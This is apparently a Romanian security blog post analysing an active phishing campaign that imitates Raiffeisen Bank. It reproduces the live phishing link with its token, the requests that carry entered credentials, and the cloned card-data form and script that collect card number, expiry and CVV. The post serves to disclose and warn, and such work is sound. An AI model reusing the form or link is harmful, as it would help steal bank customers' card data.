Furtul datelor de pe un card Raiffeisen Bank
In cele ce urmeaza va fi explicata o scamatorie prin care se pescuiesc datele unui card Raiffeisen Bank.
Linkul ascuns sub acel buton:
https://servinf.ballson.co.uk/servicii-online/internet-banking/?token=
Cu token:
aLrZiNLkmhwMYwKRxcviqkIVHfJGujVAoubqpliHoqMvcenzNnkETGWZKsQwmxKtGgkyWihsXCzWjVAVyXFcBrKhMQDXaeMqeCdnQZDtAEnJGiOHVFTZZlfvMzTOcNxPBxgPyLTIvTfFCMWQlnVwfVhjkomvKrIHpbtkzYKLSSoCNnmniNuhAdUQMPRRDYeWmpDYmUgmbDoCSfcXJehLttWpzKXjGoyNANhFwJXXOxUgBNzovyyltEmzGJhqwgmONKlEaEwgJkOSJWWsviENaHlcIiXwxZHxdXggcceNCOwtLxlxJgOoPixnFABcXJGqRleANmXEbKoBzYDXZtLDGIKXtatWOeyRgYQxzpqudWkRKyEfVROHLXgvCIOVkKFMUiKJbaGkPjCPQwQhcASUJXVvOyuEHTXNdJvEMSuDaiTJvSPEfRfRuBGjutmcBEFijGjcoIEmXdcuFFPZuHqIoCYuyfPhdAAXHloDbSLrfDdsSrJNDPTOvSUVcqAHsQyLJbuzPBhmeVLgoKIvhOnIHXRPHUSlKiayNcnitZGiruMFUUJITStlXAgTbKcDIWMJrCKeGYOmxmYjCXmRxTodIZkTfmqURqcUlaDXqvchHxfNKzusnAzvKiNiFWysJzdJJJqRIMxwYjGsCEaTZerNEvlrdITKrKokKVppAAbYRAtJevpkfVNCTBCykMDUcXqgKOkaFbKlXNTryHEGODaBFcKCKSMUYYVEZtYgRWVcqMgDzVCnYMLcMdCuoKfxXLXlctdtqDVVOCoTvbRdEbkyeuSJjvncSPtsdVeqSrBrhrlLYBRDlJRPKiVNGFCVzgqFPsGkXLFBKBtSYtmNkLvhLKoXQDtvIXSQgFjeZiKtDgDXWxVfjFEGOuHzmJcPJjwzOZOsUTosnWPvABGEzuXJBQJtHUBpayAuIpSZaCWkwkuCtgdIbOLZurPdJJZSoNMJUaAPQYApxYsVmgNGcocWaHCsGxHgrTSWryWGCRlCMTftfftvAvdYvqPyLAVNSqpJuTWrefpxXjxgzwGBTlnpfjKblrcQxCHtogGphnSLLDzLPYQJMfXnMCzpzLhZPhkGWebiLEwlUBSdaNsZwsvSaObtWQNwpulbOAvbPKIvinkxZOauVVlPwbcmYrVeCZebuMdNxgHiGyWOujvVAktfRKjMlokoVgfdFEAkxAKLhSkTzxjCviwdTEoQICgivMXgRlzBrkxPkKTKfxlHQdcMxpAWIZpeHDbRBCXFhDNuSIncJjdzpCPZXbubtxFNbikAjHkUSEoaqcQKNoFzfcFZmtyETniwvyueZHWMIzXGwVJWUiybVINJOZMfNXPVZDdZlSqxgmdUAnRNLAJVJeXJLecWXQyWxeNXaRzINbWgtaQcocwrXbZBRHmnNRJhqqRWoussXiMlbWkCrQpkiltexJwWBUdmVOiycZCwkLzKpvZLAkYqyGLTTIQlHnSGcegozrXGvfSngxTDSSEtfcEHGbcQZGruimAHXRreMCQnTsFhMXWguEuRmlSeptabqwoqUMFtTzXFRsfUUACHdgvphKjgDSIqEtNJSnnhxJUtHDjiMaDuINbxKOuIphRPLVMtNQaCuuXGDWZzIYXGmIIjCrRDNZRWbenyPboCkHcgyAlXYKMmmHcDFkrVpJNezcTdpJBgQgGeFDZDFjpGKZmdRuouYIGyzWdDPxsYTqloXwUjccdGQHKlLEpJxjBRDHoMxuNJhjrcXamgKlorhuPhaXXxhPpeVXNbhLObDsPfrrficNZLBWRcBltgpFnDvxrimafrBWpjTOghEqfiLxnbdkcffNfKqLMYhclgjGAjKpaVCcxjucHvmShlwobJxQerWlSuayCDgwevuXQXcBKfNJoCudrMYyMnUOyitDTcswYuuChHdzIxPsYCqeUWAbLBimDQFfIdkkjZyoqjZkJfnKMRmIznKrtpqkSTtfjmSCqYkiuAtvhVgqEASUgtzkVhDJchbeiwMXdkcDeaKFWTGaUWtWaUWLiDfSMViZZkWjNgbXhPuRcmWwBnkneLxEbGAgFejnxdXEHlRWYmhCocLyzhTUMRmHoifzCNtXDjDUgfFWoFYXiIcAXutdnMRzwQQJZuhwRsrThTthStJvoBZQKnNktLrnNQNauFwlWgCgCNsvRGImLgmWBAibUskQhJXiHWcsqaFPKPDEezXQdiLMYwfykaRCrTkhSVMsWRvBOlPLbXlbsjWyLBzrQqttnLWWLvqFfFuDiKVcFJYCVoIJkoQyhaMSJHsVrtneNtzSteMTYLlWBhItTIKhgKUVuiQgzjMtRXnJiZrcbSAJzVFgxpzmHHuomLubTdqNNXdl&sacjioasp=6545321564589465320031215848945622031564897846512300321564894856200031256498465418798789456489&csopsnc=WIlKVDJWlZSRqQXaNrvQTJScIMEmxxhbRXFUBZRnouQRnDdOesWvNAQbBwDKJrhBVTymBJUgcYRINpcIsUHgvtsLnaRYDogtFdjnniNyfSrUnDLNOfjkRKtnsjiMdtIRJxEgShjIBILdBRdBVXZznmbCsYGwxdVsaOMRpHgbQfjafzUP
**Am scos intentionat acel parametru afara separat. Orice incercare de a accesa acel link trebuie sa fie pe deplin asumata.
Unde se face un GET pe:
https://servinf.ballson.co.uk/%2Foperatiuni-curente/v.21.1235420120122/persoane-fizice/produsele-noastre//?csrfmiddlewaretoken=3PmA544hOOfMJPGF710I1bu6jEjHGTj2QZZPe0wmHgbkpKp8xlkBk3khenOWx1l6&number=2d2dd&password=sdasss
Cu un payload:
csrfmiddlewaretoken: 3PmA544hOOfMJPGF710I1bu6jEjHGTj2QZZPe0wmHgbkpKp8xlkBk3khenOWx1l6
number: 2d2dd
password: sdasss
Si cu un GET pe:
https://servinf.ballson.co.uk/persoane-fizice/produsele-noastre//v8032156/account/login/
Avand in referinta request-ului:
https://servinf.ballson.co.uk/%2Foperatiuni-curente/v.21.1235420120122/persoane-fizice/produsele-noastre//?csrfmiddlewaretoken=3PmA544hOOfMJPGF710I1bu6jEjHGTj2QZZPe0wmHgbkpKp8xlkBk3khenOWx1l6&number=222&password=23222
Adica exact ce am introdus in primul pas.
Si se raspunde cu o pagina aproape identica de Raiffeisen Bank:
Se poate observa ca acest atac e cat de cat bine pus la punct. Aici se face o simpla verificare a cardului.
In principiu ideea atacului e destul de buna, dar scapa anumite aspecte care pot pune pe ganduri victima. Cum ar fi textul de pe inputul cu “data expirariin”. In rest totul pare 1 la 1 cu ceva real.
Form care va face un GET:
<form method="get" action="/persoane-fizice/produsele-noastre//v1558900348893/account/login/"><input type="hidden" name="csrfmiddlewaretoken" value="sCdVsCtMWrqSYCXIGmPL8pdI4LXsrLpLfMQaByVRPTmqExGb6G9Erh3TZusHiTrP">
<input type="tel" required="" name="atmCard" maxlength="16" minlength="16" placeholder="Numărul cărții de credit">
<input type="tel" class="inputat" name="aTMExpiryDateMM" id="" required="" maxlength="5" minlength="5" onkeyup="formatString(event);" placeholder="Data expirăriin">
<div class="inputing">
<input type="tel" class="inputat1" id="" name="atmPin" required="" maxlength="3" minlength="3" placeholder="CVV">
<img src="https://cdn.webcorp.com/img/faq/credit-card-cvv.png" alt="" width="82px" height="50px" style="margin: 17px;">
</div>
<input type="submit" style="background-color:#fff200; color: #000; font-family: Arial, Helvetica, sans-serif; font-weight: 700; font-size: 16px; border-color: #d9d9dd; " value="Continua">
</form>
Ceva extrem de periculos despre care am mai amintit in alte atacuri bancare e ca inputul:
<input type="tel" required="" name="atmCard" maxlength="16" minlength="16" placeholder="Numărul cărții de credit">
Are un autocomplet:
Iar validarile din spate fac aproape identica aceasta pagina cu una adevarata:
<script>
function formatString(e) {
var inputChar = String.fromCharCode(event.keyCode);
var code = event.keyCode;
var allowedKeys = [8];
if (allowedKeys.indexOf(code) !== -1) {
return;
}
event.target.value = event.target.value.replace(
/^([1-9]\/|[2-9])$/g, '0$1/' // 3 > 03/
).replace(
/^(0[1-9]|1[0-2])$/g, '$1/' // 11 > 11/
).replace(
/^([0-1])([3-9])$/g, '0$1/$2' // 13 > 01/3
).replace(
/^(0?[1-9]|1[0-2])([0-9]{2})$/g, '$1/$2' // 141 > 01/41
).replace(
/^([0]+)\/|[0]+$/g, '0' // 0/ > 0 and 00 > 0
).replace(
/[^\d\/]|^[\/]*$/g, '' // To allow only digits and `/`
).replace(
/\/\//g, '/' // Prevent entering more than 1 `/`
);
}
</script>
Se face un GET pe:
https://servinf.ballson.co.uk/persoane-fizice/produsele-noastre//v1558900348893/account/login/?csrfmiddlewaretoken=sCdVsCtMWrqSYCXIGmPL8pdI4LXsrLpLfMQaByVRPTmqExGb6G9Erh3TZusHiTrP&atmCard=1234567891234567&aTMExpiryDateMM=02%2F23&atmPin=333
Cu payload-ul:
csrfmiddlewaretoken: sCdVsCtMWrqSYCXIGmPL8pdI4LXsrLpLfMQaByVRPTmqExGb6G9Erh3TZusHiTrP
atmCard: 1234567891234567
aTMExpiryDateMM: 02/23
atmPin: 333
Si cam aici se incheie inselatoria. Dupa acest pas nu se mai intampla nimic decat un redirect spre aceeasi pagina. Datele cardului sunt trimise si stocate. Ce s-ar mai putea intampla dupa acest pas ar fi mai un 3D Secure screen care sa apara in cazul unui card valid, care sa si valideze o tranzactie. Dar probabil autorii acestui atac se bazeaza doar pe stocarea datelor si vor incerca sa le interogheze sa vada ce sume se pot extrage de pe ele fara o eventuala interventie de 3D Secure.
Cine e in spatele acestei smecherii?
E greu de spus pentru ca toata treaba pare a fi facuta pe un domeniu fantoma de uk inregistrat anul asta, si de altfel lucrurile sunt prea bine traduse motamo. Ei nu folosesc nici mizerii de url-uri cum au mai fost intalnite in trecut cu /abracadabra/cocojambo/ ci aici ei merg pe /servicii-online/internet-banking/ si mai folosesc ancora ca /persoane-fizice/produsele-noastre//v123032566641/account/login/
O alta chestie destul de interesanta e ca ei si-au pus un certificat wildcard pentru mai multe posibile subdomenii pe acel root domain:
Ceea ce probabil inseamna ca mai au si alte tipuri de atacuri acolo tinute pe alte subdomenii.
*Orice incercare de a reproduce acest atac sau de a-l investiga trebuie sa fie asumata. Acest atac inca este activ la momentul raportului.